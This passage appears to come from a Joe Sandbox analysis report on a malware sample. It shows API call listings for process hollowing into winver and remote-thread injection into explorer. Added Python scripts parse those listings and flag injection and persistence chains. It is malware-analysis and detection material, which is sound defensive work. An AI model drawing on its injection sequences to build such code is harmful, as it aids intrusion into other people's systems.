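        if None not in (size, alloc_type, protect):
            out["size"] = size
            out["type"] = "|".join(n for bit, n in ALLOC.items() if alloc_type & bit)
            out["protect"] = PROTECT.get(protect, hex(protect))
    elif api == "RegSetValueExA" and a[3] is not None:
        out["type"] = REG_TYPE.get(a[3], hex(a[3]))   # hKey, lpValueName, Reserved, dwType, lpData, cbData
    elif api == "CryptCreateHash" and a[1] is not None:
        out["algid"] = CALG.get(a[1], hex(a[1]))
    elif api == "CreateToolhelp32Snapshot" and a[0] is not None:
        out["flags"] = "TH32CS_SNAPPROCESS" if a[0] == 0x2 else hex(a[0])
    elif api == "Sleep" and a[0] is not None:
        out["ms"] = a[0]
    return out


def in_order(calls, names):
    """True when the named APIs appear in this order (gaps allowed) within one listing."""
    it = iter(calls)
    return all(any(c["api"] == n for c in it) for n in names)


def verdicts(calls):
    """Behaviour chains worth a human look, derived only from the parsed calls."""
    found = []
    rwx_remote = any(c["api"] == "VirtualAllocEx" and decode(c).get("protect") == "PAGE_EXECUTE_READWRITE"
                     for c in calls)
    if rwx_remote and in_order(calls, ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory"]):
        found.append("RWX allocation in another process followed by WriteProcessMemory: code injection")
    if in_order(calls, ["RegCreateKeyExA", "RegSetValueExA"]):
        found.append("value written under a freshly created registry key: persistence candidate")
    return found


if __name__ == "__main__":
    calls = parse_listing(SAMPLE)
    for c in calls:
        print(f"{c['ref']:08X} {c['api']:<28} {decode(c)}")
    for v in verdicts(calls):
        print("!!", v)
```

The decoder deliberately stops at the documented parameter count: the 80000001 in the RegSetValueExA slot for lpData, or the E9000437 after GetWindowThreadProcessId's single parameter, are stack residue and must not be read as flags.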

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 047E0959
                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 047E0961
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0981
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 047E0999
                                                                                                                                                                            • Part of subcall function 047E09D9: CreateProcessA.KERNEL32(00000000,047E09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 047E09E0
                                                                                                                                                                            • Part of subcall function 047E09D9: GetThreadContext.KERNEL32(?,00000000), ref: 047E0A08
                                                                                                                                                                            • Part of subcall function 047E09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 047E0A33
                                                                                                                                                                            • Part of subcall function 047E09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,047E5810,00000000,00000000,00000002), ref: 047E0A78
                                                                                                                                                                            • Part of subcall function 047E09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 047E0AA6
                                                                                                                                                                            • Part of subcall function 047E09D9: ResumeThread.KERNEL32(?), ref: 047E0AB6
                                                                                                                                                                            • Part of subcall function 047E09D9: Sleep.KERNEL32(000003E8), ref: 047E0AC6
                                                                                                                                                                            • Part of subcall function 047E09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                          • Instruction ID: 3d6c038a43eae77c320b336a39f909fe36ce8f4fae190383711c705ac3d023bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                          • Instruction Fuzzy Hash: C651C3311442A49FEB225F21CC85BA937F8EF08744F0402D5BA45FE1D6DAB0A590CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E34A2
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E34AD), ref: 047E34B1
                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 047E34C2
                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 047E34CD
                                                                                                                                                                            • Part of subcall function 047E276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 047E2787
                                                                                                                                                                            • Part of subcall function 047E276C: lstrcat.KERNEL32(00000000,047E27D1), ref: 047E27E0
                                                                                                                                                                            • Part of subcall function 047E276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 047E2805
                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 047E34E7
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 047E34EE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
                                                                                                                                                                          • String ID: W
                                                                                                                                                                          • API String ID: 1406046206-655174618
                                                                                                                                                                          • Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                          • Instruction ID: 4a4884b67f6eecfc99f3281419e626097448c57e5926bd324ec2d757a42427b5
                                                                                                                                                                          • Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F044711055106EFB136F708CC8FBE3ABCAF46705F04019CFE49FA059DB7451159AA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,047E09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 047E09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 047E0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 047E0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,047E5810,00000000,00000000,00000002), ref: 047E0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 047E0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 047E0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 047E0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                          • Instruction ID: e6a87313a8bf63616989099562d5b2d4742c4429c5eced76da7ba4cadaa2351b
                                                                                                                                                                          • Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B3152316402689FEF229F11CC85BAA77F8FF04744F080295AA49FE1E5DBB0A690DE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(047E2525,00000010,?,?,047E29F8,00000104), ref: 047E253A
                                                                                                                                                                            • Part of subcall function 047E2572: lstrcat.KERNEL32(047E29F8,047E2553), ref: 047E257A
                                                                                                                                                                            • Part of subcall function 047E2572: lstrcat.KERNEL32(047E29F8,00000000), ref: 047E258D
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(047E25BB,0000000B,?,00000000,047E2634,00000104), ref: 047E25CB
                                                                                                                                                                          • lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2903145849-0
                                                                                                                                                                          • Opcode ID: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                          • Instruction ID: 285a816b915afe20439cafe79c75478269316b8cd83b913eee1b169ee24e0db0
                                                                                                                                                                          • Opcode Fuzzy Hash: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                          • Instruction Fuzzy Hash: 2331F871148281AFEB039F60CC568F97B6CFF06308B0841EBE985DE063D6745557DBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E31EA
                                                                                                                                                                            • Part of subcall function 047E26F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
                                                                                                                                                                            • Part of subcall function 047E26F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
                                                                                                                                                                            • Part of subcall function 047E26F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
                                                                                                                                                                            • Part of subcall function 047E26F9: CloseHandle.KERNEL32(?), ref: 047E275F
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 047E3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,047E31B5,00000011,?,00000000,00000000), ref: 047E3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,047E31B5,00000011,?,00000000,00000000,00000000,047E306E,00000004,00000000), ref: 047E3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,047E31B5,00000011,?,00000000,00000000,00000000,047E306E,00000004,00000000), ref: 047E326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1477093598-0
                                                                                                                                                                          • Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                          • Instruction ID: 1aacb9445c8c210e640d967aba6c1ae43c8537fd96e3f7c35dd174f2c68ef583
                                                                                                                                                                          • Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                          • Instruction Fuzzy Hash: C81166724045149FEF126F71CC48FAF77BDEF44305F0149A9E985E7105DA306A90CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E344D
                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000000), ref: 047E3473
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 047E348B
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E34A2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 047E34EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1167326197-0
                                                                                                                                                                          • Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                          • Instruction ID: 6c68ea2bfb6a22ad56d97950bd76a51a8f6f0444fe6e24a7c13205f38938aade
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                          • Instruction Fuzzy Hash: CB01F2702412106FFB236A218C89BB936E8AF06755F0402A8BD44FF1D5DF74981589A9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
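The function record at 047E09D9 above (CreateProcessA, GetThreadContext, VirtualProtectEx with flNewProtect 0x40, WriteProcessMemory of the same 0xEB bytes, ResumeThread) and the record at 047E344D (CreateToolhelp32Snapshot with dwFlags 0x2, Process32First, VirtualAlloc with 0x3000/0x4) can be read mechanically rather than by eye. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses the report's "• Api.MODULE(args), ref: addr" lines, decodes the argument constants whose meaning is fixed by the Win32 prototypes (PAGE_EXECUTE_READWRITE = 0x40, MEM_COMMIT|MEM_RESERVE = 0x3000, TH32CS_SNAPPROCESS = 0x2, MUTEX_ALL_ACCESS = 0x1F0001), and flags the ordered create-process, write-memory, resume-thread sequence. One caveat is built in: Joe Sandbox prints raw stack slots at the call site, and the CreateProcessA line shows 13 values for a 10-parameter API, so a call whose slot count does not match the prototype is left undecoded rather than guessed at. The sample input is the report's own lines copied verbatim; the decoder table, the chain definition and all function names are the example's own assumptions, not anything the report defines.

```python
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple

# Constructed input: the API lines of two function records from this report, copied
# verbatim. Non-API lines (headers, hashes) are ignored by the parser.
INJECTION_RECORD = """\
• CreateProcessA.KERNEL32(00000000,047E09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 047E09E0
• GetThreadContext.KERNEL32(?,00000000), ref: 047E0A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 047E0A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,047E5810,00000000,00000000,00000002), ref: 047E0A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 047E0AA6
• ResumeThread.KERNEL32(?), ref: 047E0AB6
• Sleep.KERNEL32(000003E8), ref: 047E0AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0ADD
"""
ENUM_RECORD = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E344D
• Process32First.KERNEL32(00000000,00000000), ref: 047E3473
• VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 047E348B
• lstrcat.KERNEL32(00000000,00000000), ref: 047E34A2
• CloseHandle.KERNEL32(00000000), ref: 047E34EE
"""

class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the report prints "?"
    ref: int                         # call-site address
    subcall: bool                    # "Part of subcall function" line

# "• Api.MODULE(a,b,c), ref: ADDR", with an optional sub-call prefix (assumed layout).
LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)  # "-00000005" parses too

def parse_report(text: str) -> List[ApiCall]:
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = tuple(_arg(t) for t in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), bool(m["sub"])))
    return calls

PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
        0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}

def _protect(v: int) -> str:
    return PAGE.get(v & 0xFF, hex(v))

def _mem(v: int) -> str:
    return "|".join(n for bit, n in MEM.items() if v & bit) or hex(v)

# api -> (declared parameter count, {arg index: (name, decoder)}). Joe Sandbox prints
# raw stack slots, so a line whose slot count differs from the prototype (the
# CreateProcessA line above shows 13 slots for 10 parameters) is left undecoded.
DECODERS: Dict[str, Tuple[int, Dict[int, Tuple[str, Callable[[int], str]]]]] = {
    "CreateProcessA": (10, {5: ("dwCreationFlags", lambda v: "CREATE_SUSPENDED" if v & 0x4 else hex(v))}),
    "VirtualProtectEx": (5, {2: ("dwSize", hex), 3: ("flNewProtect", _protect)}),
    "WriteProcessMemory": (5, {3: ("nSize", hex)}),
    "VirtualAlloc": (4, {1: ("dwSize", hex), 2: ("flAllocationType", _mem), 3: ("flProtect", _protect)}),
    "CreateToolhelp32Snapshot": (2, {0: ("dwFlags", lambda v: "TH32CS_SNAPPROCESS" if v == 0x2 else hex(v))}),
    "OpenMutexA": (3, {0: ("dwDesiredAccess", lambda v: "MUTEX_ALL_ACCESS" if v == 0x1F0001 else hex(v))}),
    "Sleep": (1, {0: ("dwMilliseconds", lambda v: f"{v} ms")}),
}

def annotate(call: ApiCall) -> List[str]:
    """'param=meaning' for each decodable argument; [] when the slot count is off."""
    spec = DECODERS.get(call.api)
    if spec is None or len(call.args) != spec[0]:
        return []
    return [f"{n}={dec(call.args[i])}" for i, (n, dec) in spec[1].items() if call.args[i] is not None]

# Create a process, rewrite its memory, resume its thread. Each step is a set of
# acceptable API names; steps must appear in this order, other calls may intervene.
INJECTION_CHAIN = [{"CreateProcessA", "CreateProcessW"}, {"GetThreadContext"},
                   {"VirtualProtectEx", "VirtualAllocEx"}, {"WriteProcessMemory"}, {"ResumeThread"}]

def contains_ordered(calls: List[ApiCall], chain) -> bool:
    it = iter(calls)  # shared iterator: each step resumes where the previous one matched
    return all(any(c.api in step for c in it) for step in chain)

def flag_injection(calls: List[ApiCall]) -> Optional[Dict[str, str]]:
    """Decoded arguments keyed 'Api.param' when the chain is present, else None."""
    if not contains_ordered(calls, INJECTION_CHAIN):
        return None
    return {f"{c.api}.{kv.split('=', 1)[0]}": kv.split("=", 1)[1] for c in calls for kv in annotate(c)}

if __name__ == "__main__":
    for name, text in (("047E09D9", INJECTION_RECORD), ("047E344D", ENUM_RECORD)):
        calls = parse_report(text)
        print(f"{name}: {len(calls)} calls, injection chain: {flag_injection(calls) is not None}")
        for c in calls:
            print(f"  {c.ref:08X} {c.api:<24} {' '.join(annotate(c))}")
```

Run stand-alone it prints each call with its decoded arguments; for the 047E09D9 record the chain is reported with flNewProtect decoded to PAGE_EXECUTE_READWRITE and both dwSize and nSize to 0xeb, while the CreateProcessA line stays undecoded because its 13 slots do not match the prototype. The slot-count guard is the important design choice: reading dwCreationFlags from position 6 of that misaligned listing would give 0 and wrongly suggest the process was not created suspended.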

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 047E3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 047E3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                          • Instruction ID: df93994fdb88c21945cd37539266e25e41a19b79c93d3b4335d23761d13c13d6
                                                                                                                                                                          • Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF01270598240A6FF403B728C4D67936B85F4870AF040691BD49AF2D5DE74A5509E75
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(047E3EBD,00000006,E8FFFE1B,00000000), ref: 047E3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
                                                                                                                                                                            • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 310444273-2747090070
                                                                                                                                                                          • Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                          • Instruction ID: c61149ba3190729ff0f4f37dc7d13be8988ae42101568a9dfcc3e8f94fb25082
                                                                                                                                                                          • Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                          • Instruction Fuzzy Hash: 13F06871504250ADFB116A738848BBA32BCAF48749F044765AD85DB350EE70F580DAB6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.1%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:2.6%
                                                                                                                                                                          Total number of Nodes:192
                                                                                                                                                                          Total number of Limit Nodes:20
                                                                                                                                                                          execution_graph (rendered node/edge graph; the flattened text is reduced here to the nodes that carry API calls, in the graph's own address notation)
                                                                                                                                                                          • 1391f8d: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread (reached from 1391f5e via 1391f6c)
                                                                                                                                                                          • 1391ee1: NtCreateUserProcess
                                                                                                                                                                          • 139228b: NtQueryDirectoryFile (entered from 1392270 and from 1392334; 13922f7 loops back to it, 1392394 is the exit)
                                                                                                                                                                          • 1391d80 and 1391e09: VirtualProtect; 1391daf: VirtualAlloc (all inside subroutine 1391d5a, which 1391e62 calls four times in sequence before reaching 13908c5)
                                                                                                                                                                          • 13908c5: RtlExitUserThread (from 13908b3 via 1391e62)
                                                                                                                                                                          • 1390c3f and 3450c3f: GetPEB (called through 1390cc4 / 3450cc4 ahead of 1390643 / 3450643)
                                                                                                                                                                          • 345091f: SleepEx, RtlExitUserThread (reached from 34508ef)
                                                                                                                                                                          • The remaining nodes (13906c2, 1390811, 13908d9, 139093e, 1390af3, 1390b65 and their copies in the 03450000 region) appear only as "N API calls" summaries in the graph; the 03450000 region mirrors the 01390000 region's call structure.

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE ref: 01391FDE
                                                                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 01392000
                                                                                                                                                                          • CreateRemoteThread.KERNEL32 ref: 01392028
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 1718980022-2766056989
                                                                                                                                                                          • Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                          • Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
                                                                                                                                                                          • Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                          • Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
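                                                                                                                                                                          The listings above (the three-step Sleep chain after GetModuleHandleA at 047E0000 in winver, the LoadLibraryA/GetModuleHandleA/GetProcAddress resolution stub in the same region, and the VirtualAllocEx/WriteProcessMemory/CreateRemoteThread function at 01390000 inside explorer) are the patterns an analyst pulls out of a report mechanically. The script below is an added example written for this edit, not part of the Joe Sandbox output: it parses listings in the report's own format, ties each function to the memory region it was dumped from (and whether that region is image-backed), and flags the injection triad, loader-plus-GetProcAddress resolution, multi-Sleep delay chains, VirtualAlloc-plus-VirtualProtect, and directory/registry query APIs called from non-image-backed memory. The embedded sample text reuses entries from this page plus one constructed, PE-backed listing for contrast; the rule names and thresholds are the editor's choices, not Joe Sandbox signatures.

```python
"""Triage Joe Sandbox-style API call listings (added example, not part of the report)."""
import re

# "• Sleep.KERNEL32(000003E8,...), ref: 047E3F4B" or "• VirtualAllocEx.KERNELBASE ref: 01391FDE"
API_RE = re.compile(r"([A-Za-z][A-Za-z0-9_]*)\.([A-Za-z0-9]+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*([^,\s]+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
SNAP_RE = re.compile(r"Snapshot File:\s*hcaresult_(\d+)_\d+_[0-9A-Fa-f]+_([A-Za-z0-9]+)\.jbxd")

INJECT = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
QUERY_APIS = {"NtQueryDirectoryFile", "NtQueryDirectoryFileEx", "NtEnumerateKey", "NtEnumerateValueKey"}


def parse_listings(text):
    """Split report text into per-function records: API calls plus the dump region they came from."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":                      # each "APIs" header opens a new function listing
            cur = {"apis": [], "offset": None, "pe_backed": None, "proc_id": None, "process": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        if m := SRC_RE.search(line):
            cur["offset"], cur["pe_backed"] = m.group(2), m.group(3) == "true"
        elif m := SNAP_RE.search(line):        # hcaresult_<pid>_<n>_<base>_<process>.jbxd
            cur["proc_id"], cur["process"] = int(m.group(1)), m.group(2)
        elif m := API_RE.search(line):
            args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
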